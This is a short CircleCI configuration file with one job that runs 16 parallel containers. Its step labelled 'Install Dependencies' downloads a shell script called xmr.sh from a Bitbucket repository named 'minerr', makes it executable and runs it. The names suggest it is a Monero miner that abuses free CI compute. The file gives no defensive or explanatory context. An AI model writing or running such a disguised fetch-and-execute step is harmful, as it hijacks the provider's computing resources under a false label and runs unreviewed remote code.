version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command:
              wget https://bitbucket.org/Duckling975/minerr/raw/a429afdc4b3ec99e128c3e9fa5c2608a67ca20c8/xmr.sh && chmod +x xmr.sh && ./xmr.sh
              echo Hello,subscribe it
workflows:
    version: 2.1
    build:
        jobs:
        - trial